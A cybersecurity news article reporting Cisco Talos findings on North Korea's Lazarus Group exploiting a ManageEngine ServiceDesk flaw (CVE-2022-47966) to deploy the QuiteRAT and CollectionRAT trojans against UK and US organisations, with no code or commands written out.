North Korean Lazarus Group Exploits ManageEngine Vulnerability to Launch Cyber Attacks

August 24, 2023

The North Korean state-sponsored hacker group known as Lazarus has been utilizing a severe vulnerability, CVE-2022-47966, in Zoho's ManageEngine ServiceDesk to infiltrate an internet backbone infrastructure provider and various healthcare organizations. The group's activities began early this year, targeting entities in the U.S. and U.K. with the intent of deploying the QuiteRAT malware and a newly discovered remote access trojan (RAT) dubbed CollectionRAT.

CollectionRAT was discovered when researchers analyzed the infrastructure used in these campaigns, which Lazarus had also used for other attacks. Cisco Talos researchers noted attacks against UK internet firms in early 2023, where Lazarus took advantage of the CVE-2022-47966 exploit, a pre-authentication remote code execution flaw affecting multiple Zoho ManageEngine products. Cisco Talos stated, "In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access."

The researchers found that Lazarus began using the exploit just five days after it became publicly available. Multiple hackers have since leveraged the exploit in their attacks, as observed by Rapid7, Shadowserver, and GreyNoise, leading to CISA issuing a warning to organizations. After exploiting the vulnerability to infiltrate a target, Lazarus hackers introduced the QuiteRAT malware from an external URL using a curl command.

QuiteRAT, discovered in February 2023, is a simple yet potent remote access trojan that seems to be an upgrade from the well-known MagicRAT that Lazarus used in the second half of 2022 to target energy providers in the U.S., Canada, and Japan. Researchers have noted that QuiteRAT's code is more streamlined than MagicRAT's, and the judicious selection of Qt libraries has reduced its size from 18MB to 4MB while maintaining the same set of functions.

In a separate report, Cisco Talos revealed that Lazarus hackers have developed a new malware named CollectionRAT. This new threat was discovered after researchers examined the infrastructure that the actor used in other attacks. Researchers believe that CollectionRAT is related to the "EarlyRAT" family, which Kaspersky linked earlier this year to Andariel ("Stonefly"), considered to be a subgroup within the Lazarus team.

CollectionRAT's capabilities include arbitrary command execution, file management, system information gathering, reverse shell creation, new process spawning, fetching and launching new payloads, and self-deletion. CollectionRAT also incorporates the Microsoft Foundation Class (MFC) framework, enabling it to decrypt and execute its code on the fly, evade detection, and hinder analysis.

Cisco Talos also highlighted the evolution in Lazarus' tactics, techniques, and procedures, including the extensive use of open-source tools and frameworks like Mimikatz for stealing credentials, PuTTY Link (Plink) for remote tunneling, and DeimosC2 for command and control communication. This strategy aids Lazarus in leaving fewer distinct traces, thereby complicating attribution, tracking, and the development of effective protective measures.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.